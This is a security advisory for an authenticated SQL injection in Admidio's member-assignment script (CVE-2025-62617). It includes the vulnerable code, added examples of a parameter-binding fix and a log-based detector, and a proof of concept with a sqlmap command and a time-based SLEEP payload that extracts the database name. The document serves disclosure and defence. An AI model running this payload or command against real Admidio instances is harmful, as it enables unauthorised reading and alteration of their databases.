Authenticated SQL Injection in Member Assignment Functionality

High
Fasse published GHSA-2v5m-cq9w-fc33 Oct 22, 2025

Package

admidio

Affected versions

<= 4.3.16

Patched versions

4.3.17

Description

Summary

An authenticated SQL injection vulnerability exists in the member assignment data retrieval functionality of Admidio. Any authenticated user with permissions to assign members to a role (such as an administrator) can exploit this vulnerability to execute arbitrary SQL commands. This can lead to a full compromise of the application's database, including reading, modifying, or deleting all data. The vulnerability is present in the latest version, 4.3.16.

Details

The vulnerability is located in the adm_program/modules/groups-roles/members_assignment_data.php script. This script handles an AJAX request to fetch a list of users for role assignment. The filter_rol_uuid GET parameter is not properly sanitized before being used in a raw SQL query.

File: adm_program/modules/groups-roles/members_assignment_data.php

// ... 
// The parameter is retrieved from the GET request without sufficient sanitization for SQL context.
$getFilterRoleUuid = admFuncVariableIsValid($_GET, 'filter_rol_uuid', 'string');
$getMembersShowAll = admFuncVariableIsValid($_GET, 'mem_show_all', 'bool', array('defaultValue' => false));

// ... 
$filterRoleCondition = '';
if ($getMembersShowAll) {
    $getFilterRoleUuid = 0;
} else {
    // show only members of current organization
    if ($getFilterRoleUuid !== '') {
        // VULNERABLE CODE: $getFilterRoleUuid is directly concatenated into the query string.
        $filterRoleCondition = ' AND rol_uuid = \''.$getFilterRoleUuid . '\'';
    }
}

// ...
// The vulnerable $filterRoleCondition is then used inside a subselect.
$sqlSubSelect = '(SELECT COUNT(*) AS count_this
                    FROM '.TBL_MEMBERS.'
              INNER JOIN '.TBL_ROLES.'
                      ON rol_id = mem_rol_id
              INNER JOIN '.TBL_CATEGORIES.'
                      ON cat_id = rol_cat_id
                   WHERE mem_usr_id  = usr_id
                     AND mem_begin  <= \''.DATE_NOW.'\'
                     AND mem_end     > \''.DATE_NOW.'\'
                         '.$filterRoleCondition.'
                     AND rol_valid = true
                     AND cat_name_intern <> \'EVENTS\'
                     AND cat_org_id = '.$gCurrentOrgId.')';
// ...

As shown above, the value of $getFilterRoleUuid is directly concatenated into the $filterRoleCondition variable, which is then embedded within a larger SQL query ($sqlSubSelect). This allows an attacker to break out of the string literal and inject arbitrary SQL commands.
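The two defenses a maintainer would normally apply here are strict input validation (a role UUID has a fixed shape, so anything else can be rejected before it reaches SQL) and parameter binding (the value travels to the database separately from the SQL text, so a quote in it cannot end the string literal). The following is an added illustration of both, not Admidio's actual fix in 4.3.17. The `isValidUuid` and `buildMemberCountSubSelect` functions, the `$db` PDO connection in the trailing comment, and the table-name constants standing in for Admidio's `TBL_*` constants are all assumptions made for this example; it runs from the PHP CLI without a database.

```php
<?php
// Added example, not Admidio's own code. Shows validation plus parameter binding
// for the filter_rol_uuid value that members_assignment_data.php concatenates.

// Hypothetical stand-ins for Admidio's TBL_* table-name constants.
const TBL_MEMBERS    = 'adm_members';
const TBL_ROLES      = 'adm_roles';
const TBL_CATEGORIES = 'adm_categories';

/**
 * Defense 1: allowlist validation. A role UUID is 36 hex/hyphen characters;
 * a quote, a parenthesis or a SLEEP() call can never pass this check.
 */
function isValidUuid(string $value): bool
{
    return (bool) preg_match(
        '/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i',
        $value
    );
}

/**
 * Defense 2: parameter binding. Returns the subselect with ? placeholders and
 * the bound values as a separate array, in placeholder order, so user input
 * never becomes part of the SQL text.
 *
 * @return array{0: string, 1: array<int, string|int>}
 */
function buildMemberCountSubSelect(string $filterRoleUuid, bool $showAll, int $currentOrgId, string $dateNow): array
{
    $params = [$dateNow, $dateNow];   // mem_begin <= ?, mem_end > ?
    $filterRoleCondition = '';

    if (!$showAll && $filterRoleUuid !== '') {
        if (!isValidUuid($filterRoleUuid)) {
            throw new InvalidArgumentException('filter_rol_uuid is not a UUID');
        }
        $filterRoleCondition = ' AND rol_uuid = ?';
        $params[] = $filterRoleUuid;
    }
    $params[] = $currentOrgId;        // cat_org_id = ?

    $sql = '(SELECT COUNT(*) AS count_this
               FROM ' . TBL_MEMBERS . '
         INNER JOIN ' . TBL_ROLES . ' ON rol_id = mem_rol_id
         INNER JOIN ' . TBL_CATEGORIES . ' ON cat_id = rol_cat_id
              WHERE mem_usr_id = usr_id
                AND mem_begin <= ?
                AND mem_end > ?'
                . $filterRoleCondition . '
                AND rol_valid = true
                AND cat_name_intern <> \'EVENTS\'
                AND cat_org_id = ?)';

    return [$sql, $params];
}

// Demonstration on constructed input (no database needed).
$legitUuid = '3f2c8b1e-7d4a-4c2f-9a6b-1e2d3c4b5a60';
[$sql, $params] = buildMemberCountSubSelect($legitUuid, false, 1, '2025-10-22');
echo $sql, "\n", json_encode($params), "\n";

// A value of the shape the advisory's PoC uses is rejected before any SQL exists.
try {
    buildMemberCountSubSelect("' AND (SELECT SLEEP(5)) AND '1'='1", false, 1, '2025-10-22');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// With PDO (connection $db assumed) the placeholders are bound like this:
// $stmt = $db->prepare('SELECT usr_id, ' . $sql . ' FROM adm_users');
// $stmt->execute($params);
```

Either defense alone closes this particular injection; keeping both means a future change that relaxes the validation (for instance to accept a numeric role id as well) does not silently reopen the query. Note that the placeholder order in `$params` must match the order in which `?` appears in the SQL, which is why the org id is appended last.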

PoC (Proof of Concept)

Prerequisites:

  1. A running instance of Admidio (tested on version 4.3.16).
  2. An authenticated user session with permissions to assign members to a role (e.g., the default 'admin' user).

Execution:
The vulnerability can be triggered by manipulating the filter_rol_uuid parameter in the request to /adm_program/modules/groups-roles/members_assignment_data.php. Due to the large number of parameters, the easiest way to reproduce this is by capturing a legitimate request and replaying it with sqlmap.

  1. Log in to Admidio as an administrator.
  2. Navigate to Groups / Roles.
  3. Click the "Assign members" icon for any existing role.
  4. Using a web proxy like Burp Suite, intercept the GET request made to /adm_program/modules/groups-roles/members_assignment_data.php.
  5. Save the entire raw request to a text file (e.g., admidio_request.txt).
  6. Run the following sqlmap command to confirm the time-based blind SQL injection:
sqlmap -r /path/to/admidio_request.txt -p filter_rol_uuid --technique=T --dbms=mysql --current-db

Result:
sqlmap will successfully identify and exploit the time-based blind SQL injection vulnerability.

---
Parameter: filter_rol_uuid (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: role_uuid=...&filter_rol_uuid=' AND (SELECT 3332 FROM (SELECT(SLEEP(5)))vqnl) AND 'ENdG'='ENdG&...
---
[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
[INFO] retrieved: admidio
current database: 'admidio'

This confirms that an attacker can execute arbitrary SQL queries and extract information from the database.
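For sites that cannot upgrade to 4.3.17 immediately, or that want to check whether the endpoint was probed before the patch, the request shape is easy to recognise: the legitimate parameter is always a UUID, and both a manual quote break-out and sqlmap's time-based probes fail that test. The following is an added detection example, not part of the advisory or of Admidio; it parses access-log lines in the Apache/nginx combined format, and the `findSuspiciousRequests` function and the sample log lines are constructed for this illustration.

```php
<?php
// Added example, not part of the advisory or of Admidio. Scans access-log lines
// (combined format, samples constructed below) for requests to the affected
// script whose filter_rol_uuid value is not a UUID.

const TARGET_SCRIPT = '/adm_program/modules/groups-roles/members_assignment_data.php';

function isValidUuid(string $value): bool
{
    return (bool) preg_match(
        '/^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i',
        $value
    );
}

/**
 * Returns one finding per suspicious line: [client IP, reason, offending value].
 */
function findSuspiciousRequests(array $logLines): array
{
    $findings = [];
    foreach ($logLines as $line) {
        // Combined format: ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "user-agent"
        $pattern = '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" \d+ \S+ "[^"]*" "([^"]*)"/';
        if (!preg_match($pattern, $line, $m)) {
            continue;   // not a request line in the expected format
        }
        [, $ip, $target, $userAgent] = $m;

        $url = parse_url($target);
        if (($url['path'] ?? '') !== TARGET_SCRIPT) {
            continue;   // only the vulnerable script is of interest
        }
        parse_str($url['query'] ?? '', $params);   // parse_str URL-decodes the values
        $filter = (string) ($params['filter_rol_uuid'] ?? '');

        if ($filter !== '' && !isValidUuid($filter)) {
            $findings[] = [$ip, 'filter_rol_uuid is not a UUID', $filter];
        } elseif (stripos($userAgent, 'sqlmap') !== false) {
            // sqlmap's default User-Agent names the tool; flag it even when a
            // particular request happened to carry a well-formed value
            $findings[] = [$ip, 'sqlmap user agent', $userAgent];
        }
    }
    return $findings;
}

// Constructed sample log lines (not real traffic). The second line carries a
// URL-encoded quote break-out with a SLEEP() call, i.e. the shape of the PoC payload.
$sampleLog = [
    '10.0.0.5 - - [22/Oct/2025:10:00:01 +0000] "GET ' . TARGET_SCRIPT
        . '?role_uuid=7a0e4d12-5c3b-4f8e-a9d1-0b2c3d4e5f60&filter_rol_uuid=3f2c8b1e-7d4a-4c2f-9a6b-1e2d3c4b5a60&mem_show_all=0 HTTP/1.1" 200 4210 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Oct/2025:10:02:17 +0000] "GET ' . TARGET_SCRIPT
        . '?role_uuid=7a0e4d12-5c3b-4f8e-a9d1-0b2c3d4e5f60&filter_rol_uuid=%27%20AND%20%28SELECT%20SLEEP%285%29%29%20AND%20%271%27%3D%271&mem_show_all=0 HTTP/1.1" 200 4210 "-" "sqlmap/1.8 (https://sqlmap.org)"',
    '10.0.0.5 - - [22/Oct/2025:10:03:40 +0000] "GET ' . TARGET_SCRIPT
        . '?role_uuid=7a0e4d12-5c3b-4f8e-a9d1-0b2c3d4e5f60&mem_show_all=1 HTTP/1.1" 200 9801 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [22/Oct/2025:10:04:02 +0000] "GET /adm_program/modules/profile/profile.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
];

foreach (findSuspiciousRequests($sampleLog) as [$ip, $reason, $value]) {
    printf("%s  %s  %s\n", $ip, $reason, $value);
}
```

Only the second line is reported. Because time-based blind injection produces no error and a normal status code, the malformed parameter value is the reliable signal in the log; a response-time field (`%D` in Apache, `$request_time` in nginx), if logged, would additionally show the five-second delays the PoC relies on.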

Severity

High


CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: High
User interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE ID

CVE-2025-62617

Weaknesses

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Learn more on MITRE.

Credits